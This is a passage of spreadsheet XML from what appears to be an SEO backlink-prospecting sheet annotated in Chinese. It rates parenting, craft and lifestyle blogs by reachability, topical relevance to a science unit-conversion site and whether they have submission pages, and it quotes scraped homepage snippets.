      <x:c r="N358" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O358" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P358" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q358" s="21" t="str">
        <x:v>Are you navigating family life alone or with a traveling partner? Find adventures, mom tips and hacks, and travel insights. Thrive with toddler activities, and self-care for busy moms with the help of Notion digital templates. THE TRAVELING AVIATORS | Toddler &amp; Mom Resources 0 Skip to Content THE TRAVELING AVIATORS Home About About About Elizabeth Blog All Blog Posts Toddler Activities SELF-CARE &amp; WELLNESS FOR MOMS Travel Tips &amp; Hacks Tax Preparation Resources Games Free Activity To Teach Feelings Open Menu Close Menu THE TRAVELING AVIATORS Home About About About Elizabeth Blog All Blog Posts Toddler Activities SELF-CARE &amp; WELLNESS FOR MOMS Travel Tips &amp; Hacks Tax Preparation Resources Games Free Activity To Teach Feelings Open Menu Close Menu Home Folder: About Back About About Elizabeth Folder: Blog Back All Blog Posts Toddler Activities SELF-CARE &amp; WELLNESS FOR MOMS Travel Tips &amp; Hacks Tax Preparation Resources</x:v>
      </x:c>
      <x:c r="R358" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S358" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T358" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thetravelingaviators.com</x:v>
      </x:c>
    </x:row>
    <x:row r="359">
      <x:c r="A359" s="18" t="str">
        <x:v>358</x:v>
      </x:c>
      <x:c r="B359" s="19" t="str">
        <x:v>adventuresofadiymom.com</x:v>
      </x:c>
      <x:c r="C359" s="19" t="str">
        <x:v>https://adventuresofadiymom.com</x:v>
      </x:c>
      <x:c r="D359" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E359" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F359" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G359" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H359" s="19" t="str">
        <x:v>https://www.adventuresofadiymom.com/</x:v>
      </x:c>
      <x:c r="I359" s="19" t="str">
        <x:v>Adventures of a DIY Mom</x:v>
      </x:c>
      <x:c r="J359" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K359" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L359" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M359" s="19" t="str">
        <x:v>https://www.adventuresofadiymom.com/</x:v>
      </x:c>
      <x:c r="N359" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O359" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P359" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q359" s="21" t="str">
        <x:v>A blog about crafts, DIY, sewing, and recipes. Create your own projects using my easy to follow step-by-step instructions. Adventures of a DIY Mom Primary Menu Pages Home About Recipes _Brownies _Cakes _Candy _Cookies _Desserts _Muffins &amp; Quick Breads _Pies _Breads _Breakfast _Canning &amp; Preserving _Dinner _Side Dishes _Non-Food Recipes _Food Roundups Crafts _Crafts _Craft Roundups _DIY Projects _Furniture Makeovers _Jewelry _Missionary Care Pkgs Holiday Crafts _Valentine's Day _St. Patrick's Day _Easter _Spring _4th of July _Autumn _Halloween _Thanksgiving _Christmas Quilting _Quilt Blocks _Quilt Patterns _Quilt Tutorials _Quilt-Alongs _Quilt Roundups Sewing _Sewing Projects _Clothes to Sew _Sewing Roundups Crochet _Crochet Stitches _Crochet Patterns _Crochet Roundups Embroidery _Embroidery Stitches _Embroidery </x:v>
      </x:c>
      <x:c r="R359" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S359" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T359" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://adventuresofadiymom.com</x:v>
      </x:c>
    </x:row>
    <x:row r="360">
      <x:c r="A360" s="18" t="str">
        <x:v>359</x:v>
      </x:c>
      <x:c r="B360" s="19" t="str">
        <x:v>onemamasdailydrama.com</x:v>
      </x:c>
      <x:c r="C360" s="19" t="str">
        <x:v>https://onemamasdailydrama.com</x:v>
      </x:c>
      <x:c r="D360" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E360" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F360" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G360" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H360" s="19" t="str">
        <x:v>https://onemamasdailydrama.com/</x:v>
      </x:c>
      <x:c r="I360" s="19" t="str">
        <x:v>Homepage - One Mama's Daily Drama</x:v>
      </x:c>
      <x:c r="J360" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K360" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L360" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M360" s="19" t="str">
        <x:v>https://onemamasdailydrama.com/</x:v>
      </x:c>
      <x:c r="N360" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O360" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P360" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q360" s="21" t="str">
        <x:v>One Mama's Daily Drama is a family lifestyle blog by Keri Houchin with crafts, kids’ activities, and year-round holiday ideas. Homepage - One Mama's Daily Drama Skip to primary navigation Skip to main content Skip to footer Crafts Holiday Valentine’s Day Easter Mother’s Day End of School Father’s Day July 4th Back to School Halloween Thanksgiving Christmas Kids LEGO games coloring pages writing books Planner pages tutorials Recipes Shop One Mama's Daily Drama Organized Chaos for Year-Round Family Fun Crafts Kids Planner Recipes Popular on One Mama’s Daily Drama About the Creator Welcome to One Mama’s Daily Drama! I created this blog when my kids were little as a way to help parents navigate the chaos of family life. Here you’ll find crafts, kids’ activities, and year-round holiday ideas. I’ve also got tons of planne</x:v>
      </x:c>
      <x:c r="R360" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S360" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T360" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://onemamasdailydrama.com</x:v>
      </x:c>
    </x:row>
    <x:row r="361">
      <x:c r="A361" s="18" t="str">
        <x:v>360</x:v>
      </x:c>
      <x:c r="B361" s="19" t="str">
        <x:v>kidzcraftcorner.com</x:v>
      </x:c>
      <x:c r="C361" s="19" t="str">
        <x:v>https://kidzcraftcorner.com</x:v>
      </x:c>
      <x:c r="D361" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E361" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F361" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G361" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H361" s="19" t="str">
        <x:v>https://kidzcraftcorner.com/</x:v>
      </x:c>
      <x:c r="I361" s="19" t="str">
        <x:v>Home - Kidz Craft Corner</x:v>
      </x:c>
      <x:c r="J361" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K361" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L361" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M361" s="19" t="str">
        <x:v>https://kidzcraftcorner.com/</x:v>
      </x:c>
      <x:c r="N361" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O361" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P361" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q361" s="21" t="str">
        <x:v>Welcome to Kidz Craft Corner, the ultimate craft blog for kids! Our mission is to inspire creativity and encourage imagination through a variety of fun and easy-to-follow craft projects. Home - Kidz Craft Corner Skip to content Trending Post : 15 Adorable Panda Crafts For Kids Crafts Activities Printables Holiday Shop Resources About Contact Us Get your child excited about chores -with our free Chore Chart! Grab it now! Kids Crafts Activities Printables Holidays Get the latest in your inbox! Kids Crafts Are you looking for a fun and creative way to entertain your child? Then our kid’s crafts section is perfect for you! Our crafts are designed to engage children of all ages and help develop their imagination, creativity, and motor skills. With step-by-step instructions and easy-to-find materials, our crafts are a great way to spend quality time with your kids and create memor</x:v>
      </x:c>
      <x:c r="R361" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S361" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T361" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://kidzcraftcorner.com</x:v>
      </x:c>
    </x:row>
    <x:row r="362">
      <x:c r="A362" s="18" t="str">
        <x:v>361</x:v>
      </x:c>
      <x:c r="B362" s="19" t="str">
        <x:v>kirbyskorner.site</x:v>
      </x:c>
      <x:c r="C362" s="19" t="str">
        <x:v>https://kirbyskorner.site</x:v>
      </x:c>
      <x:c r="D362" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E362" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F362" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G362" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H362" s="19" t="str">
        <x:v>https://pollywogsplace.com/</x:v>
      </x:c>
      <x:c r="I362" s="19" t="str">
        <x:v>Pollywog's Place Blog – Where LIFE is ALWAYS a little bit CRAZY, a little bit LOUD, but filled with LOVE and a whole LOT of JESUS!</x:v>
      </x:c>
      <x:c r="J362" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K362" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L362" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M362" s="19" t="str">
        <x:v>https://pollywogsplace.com/</x:v>
      </x:c>
      <x:c r="N362" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O362" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P362" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q362" s="21" t="str">
        <x:v>Where LIFE is ALWAYS a little bit CRAZY, a little bit LOUD, but filled with LOVE and a whole LOT of JESUS! Pollywog's Place Blog – Where LIFE is ALWAYS a little bit CRAZY, a little bit LOUD, but filled with LOVE and a whole LOT of JESUS! Skip to content Pollywog's Place Blog Menu Home Sabbath &amp; Biblical Feasts Sabbath Resources Printable Bible Studies and Devotionals Biblical Feasts: Spring Feast Resources Biblical Feasts: Fall Feast Resources Mama’s Recipe Box Crazy Delicious Low-Carb Substitutions You Can Make Today! Holiday Recipes Special Holiday Meals Appetizers Beverages Breads Breakfasts Butters, Jams, &amp; Jellies Plus Misc. Canning Recipes Cakes Icings Candies Cookies Crockpot Meals Gluten Free/Grain Free Recipes Gravies, Mixes, Sauces, and Such Main Dishes Pies, Puddings, and Desserts Quic</x:v>
      </x:c>
      <x:c r="R362" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S362" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T362" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://kirbyskorner.site</x:v>
      </x:c>
    </x:row>
    <x:row r="363">
      <x:c r="A363" s="18" t="str">
        <x:v>362</x:v>
      </x:c>
      <x:c r="B363" s="19" t="str">
        <x:v>jennaye.com</x:v>
      </x:c>
      <x:c r="C363" s="19" t="str">
        <x:v>https://jennaye.com</x:v>
      </x:c>
      <x:c r="D363" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E363" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F363" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G363" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H363" s="19" t="str">
        <x:v>https://www.jennaye.com/</x:v>
      </x:c>
      <x:c r="I363" s="19" t="str">
        <x:v>Jen Naye Herrmann | Chicago Lifestyle Blogger</x:v>
      </x:c>
      <x:c r="J363" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K363" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L363" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M363" s="19" t="str">
        <x:v>https://www.jennaye.com/</x:v>
      </x:c>
      <x:c r="N363" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O363" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P363" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q363" s="21" t="str">
        <x:v>Our love of brands is fueled by helping businesses build and expand their messaging through authentic and compelling digital storytelling in a modern world. Jen Naye Herrmann | Chicago Lifestyle Blogger 0 Skip to Content have a browse Interiors Inspiration Shop My Home Living Motherhood &amp; Kids Food &amp; Drink Travel Organization Wellness Celebrations Career Advice &amp; Tips My Day Job All Posts The Shop Open Menu Close Menu have a browse Interiors Inspiration Shop My Home Living Motherhood &amp; Kids Food &amp; Drink Travel Organization Wellness Celebrations Career Advice &amp; Tips My Day Job All Posts The Shop Open Menu Close Menu have a browse Folder: Interiors Back Inspiration Shop My Home Folder: Living Back Motherhood &amp; Kids Food &amp; Drink Travel Organization Wellness Celebrations Folder: Career Back Advice &amp; Tips My Day Job All Posts The Shop Featured 25 Fat</x:v>
      </x:c>
      <x:c r="R363" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S363" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T363" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://jennaye.com</x:v>
      </x:c>
    </x:row>
    <x:row r="364">
      <x:c r="A364" s="18" t="str">
        <x:v>363</x:v>
      </x:c>
      <x:c r="B364" s="19" t="str">
        <x:v>upjourney.com</x:v>
      </x:c>
      <x:c r="C364" s="19" t="str">
        <x:v>https://upjourney.com</x:v>
      </x:c>
      <x:c r="D364" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E364" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F364" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G364" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H364" s="19" t="str">
        <x:v>https://upjourney.com/</x:v>
      </x:c>
      <x:c r="I364" s="19" t="str">
        <x:v>UpJourney - Live a Happy, Healthy and Successful Life</x:v>
      </x:c>
      <x:c r="J364" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K364" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L364" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M364" s="19" t="str">
        <x:v>https://upjourney.com/</x:v>
      </x:c>
      <x:c r="N364" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O364" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P364" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q364" s="21" t="str">
        <x:v>A self-improvement platform centered on career progress, personal relationships, and harnessing your unique talents and resources for personal growth. UpJourney - Live a Happy, Healthy and Successful Life Skip to content UpJourney Menu Relationships Featured Relationships How to Tell If a Man Is Attracted to You but Hiding It (26 Signs + Expert Insights) Love &amp; Dating Dating Love &amp; Intimacy Marriage Exes &amp; Heartbreak People &amp; Family Family Parenting Friendship Red Flags Narcissism Explore all 348 relationship articles &amp;rarr; Personal Growth Featured Psychology Attachment Theory: Definition, Types &amp; Stages Mind &amp; Psychology Psychology Psychology Terms Mental Health Therapy Mindfulness Grow &amp; Thrive Self-Esteem Social Skills Happiness Success Personal Finance Explore all 308 personal growth articles &amp;rarr; Career Featured Career How to Sell </x:v>
      </x:c>
      <x:c r="R364" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S364" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T364" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://upjourney.com</x:v>
      </x:c>
    </x:row>
    <x:row r="365">
      <x:c r="A365" s="18" t="str">
        <x:v>364</x:v>
      </x:c>
      <x:c r="B365" s="19" t="str">
        <x:v>millennimama.com</x:v>
      </x:c>
      <x:c r="C365" s="19" t="str">
        <x:v>https://millennimama.com</x:v>
      </x:c>
      <x:c r="D365" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E365" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F365" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G365" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H365" s="19" t="str">
        <x:v>https://millennimama.com/</x:v>
      </x:c>
      <x:c r="I365" s="19" t="str">
        <x:v>Millennimama - Let’s talk babies from Millennial Mamas</x:v>
      </x:c>
      <x:c r="J365" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K365" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L365" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M365" s="19" t="str">
        <x:v>https://millennimama.com/</x:v>
      </x:c>
      <x:c r="N365" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O365" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P365" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q365" s="21" t="str">
        <x:v>Let’s talk babies from Millennial Mamas Millennimama - Let’s talk babies from Millennial Mamas Loading Comments... Write a Comment... Email (Required) Name (Required) Website Notifications</x:v>
      </x:c>
      <x:c r="R365" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S365" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T365" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://millennimama.com</x:v>
      </x:c>
    </x:row>
    <x:row r="366">
      <x:c r="A366" s="18" t="str">
        <x:v>365</x:v>
      </x:c>
      <x:c r="B366" s="19" t="str">
        <x:v>homesteadlady.com</x:v>
      </x:c>
      <x:c r="C366" s="19" t="str">
        <x:v>https://homesteadlady.com</x:v>
      </x:c>
      <x:c r="D366" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E366" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F366" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G366" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H366" s="19" t="str">
        <x:v>https://homesteadlady.com/</x:v>
      </x:c>
      <x:c r="I366" s="19" t="str">
        <x:v>Homestead Lady • Building our self-sufficient lifestyle one level at a time.</x:v>
      </x:c>
      <x:c r="J366" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K366" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L366" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M366" s="19" t="str">
        <x:v>https://homesteadlady.com/</x:v>
      </x:c>
      <x:c r="N366" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O366" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P366" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q366" s="21" t="str">
        <x:v>Building our self-sufficient lifestyle one level at a time. Homestead Lady • Building our self-sufficient lifestyle one level at a time. Skip to primary navigation Skip to main content Skip to primary sidebar Homestead Lady Building our self-sufficient lifestyle one level at a time. Topics Gardens &amp; Herbs Homestead Design &amp; Permaculture Healthy Recipes &amp; Preservation Homestead Family Green Living Small Farm Livestock Shop Shop Subscribe About Us ❧ Our Mission Privacy Policy Search this website – RECIPES &amp; KITCHEN TIPS – Instant Pot Grape Juice Recipe Make Healthy Juices at Home Do I Have to Can? Food Preservation Goals - MORE FOODS &amp; PRESERVATION - – HOMESTEAD DESIGN &amp; PERMACULTURE – Renewable Resources: Solutions for Homestead Problems (5th Permacul</x:v>
      </x:c>
      <x:c r="R366" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S366" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T366" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://homesteadlady.com</x:v>
      </x:c>
    </x:row>
    <x:row r="367">
      <x:c r="A367" s="18" t="str">
        <x:v>366</x:v>
      </x:c>
      <x:c r="B367" s="19" t="str">
        <x:v>moneysavvyliving.com</x:v>
      </x:c>
      <x:c r="C367" s="19" t="str">
        <x:v>https://moneysavvyliving.com</x:v>
      </x:c>
      <x:c r="D367" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E367" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F367" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G367" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H367" s="19" t="str">
        <x:v>https://moneysavvyliving.com/</x:v>
      </x:c>
      <x:c r="I367" s="19" t="str">
        <x:v>Money Savvy Living - living the good life... on a budget</x:v>
      </x:c>
      <x:c r="J367" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K367" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L367" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M367" s="19" t="str">
        <x:v>https://moneysavvyliving.com/</x:v>
      </x:c>
      <x:c r="N367" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O367" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P367" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q367" s="21" t="str">
        <x:v>living the good life... on a budget Money Savvy Living - living the good life... on a budget Skip to primary navigation Skip to main content Skip to primary sidebar Skip to footer Money Savvy Living living the good life... on a budget Home Blog About Personal Finance Recipes Travel Parenting Blogging Resources Healthy Living Juice Plus+ Smoothie Recipes Become a Juice Plus+ Consultant Buy Juice Plus+ Amazon Store Contact Show Search Search this website Hide Search Main Content Strawberry Mango Smoothie Drop Sugar Cookies ~ 1 Easy Recipe, 4 Different Flavors Frosted Maple Cookies Homemade Strawberry Jam for Canning Personal Finance Building Your Brand as a Medicare Agent: Providing Exceptional Service During Open Enrollment For</x:v>
      </x:c>
      <x:c r="R367" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S367" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T367" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://moneysavvyliving.com</x:v>
      </x:c>
    </x:row>
    <x:row r="368">
      <x:c r="A368" s="18" t="str">
        <x:v>367</x:v>
      </x:c>
      <x:c r="B368" s="19" t="str">
        <x:v>metafilter.com</x:v>
      </x:c>
      <x:c r="C368" s="19" t="str">
        <x:v>https://metafilter.com</x:v>
      </x:c>
      <x:c r="D368" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E368" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F368" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G368" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H368" s="19" t="str">
        <x:v>https://www.metafilter.com/</x:v>
      </x:c>
      <x:c r="I368" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J368" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K368" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L368" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M368" s="19" t="str">
        <x:v>https://www.metafilter.com/</x:v>
      </x:c>
      <x:c r="N368" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O368" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P368" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q368" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R368" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S368" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T368" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://metafilter.com</x:v>
      </x:c>
    </x:row>
    <x:row r="369">
      <x:c r="A369" s="18" t="str">
        <x:v>368</x:v>
      </x:c>
      <x:c r="B369" s="19" t="str">
        <x:v>everydaywithmadirae.com</x:v>
      </x:c>
      <x:c r="C369" s="19" t="str">
        <x:v>https://everydaywithmadirae.com</x:v>
      </x:c>
      <x:c r="D369" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E369" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F369" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G369" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H369" s="19" t="str">
        <x:v>https://everydaywithmadirae.com/</x:v>
      </x:c>
      <x:c r="I369" s="19" t="str">
        <x:v>Home</x:v>
      </x:c>
      <x:c r="J369" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K369" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L369" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M369" s="19" t="str">
        <x:v>https://everydaywithmadirae.com/</x:v>
      </x:c>
      <x:c r="N369" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O369" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P369" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q369" s="21" t="str">
        <x:v>Home Home About FAQ Contact Clean Beauty Skincare Makeup Hair Beautycounter All Clean Beauty Wellness Non-Toxic Living Wellness Tips All Wellness Lifestyle Style Travel Wedding All Lifestyle Recipes Shop Beautycounter LikeToKnowIt Discount Codes + Links everyday with madi rae everyday with madi rae Clean Beauty Skincare Makeup Hair Beautycounter All Clean Beauty Wellness Non-Toxic Living Wellness Tips All Wellness Lifestyle Style Travel Wedding All Lifestyle Recipes Shop Beautycounter LikeToKnowIt Discount Codes + Links January 15, 2025 Honest ILIA Beauty Review November 25, 2024 2024 Stocking Stuffer Gift Guide hey friend! Everyday with Madi Rae is a Clean Beauty, Lifestyle, &amp; Wellness blog</x:v>
      </x:c>
      <x:c r="R369" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S369" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T369" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://everydaywithmadirae.com</x:v>
      </x:c>
    </x:row>
    <x:row r="370">
      <x:c r="A370" s="18" t="str">
        <x:v>369</x:v>
      </x:c>
      <x:c r="B370" s="19" t="str">
        <x:v>crazylaura.com</x:v>
      </x:c>
      <x:c r="C370" s="19" t="str">
        <x:v>https://crazylaura.com</x:v>
      </x:c>
      <x:c r="D370" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="E370" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F370" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G370" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H370" s="19" t="str">
        <x:v>https://www.crazylaura.com/</x:v>
      </x:c>
      <x:c r="I370" s="19" t="str">
        <x:v>Crazy Laura - Fun DIY Projects &amp; More!</x:v>
      </x:c>
      <x:c r="J370" s="19" t="str">
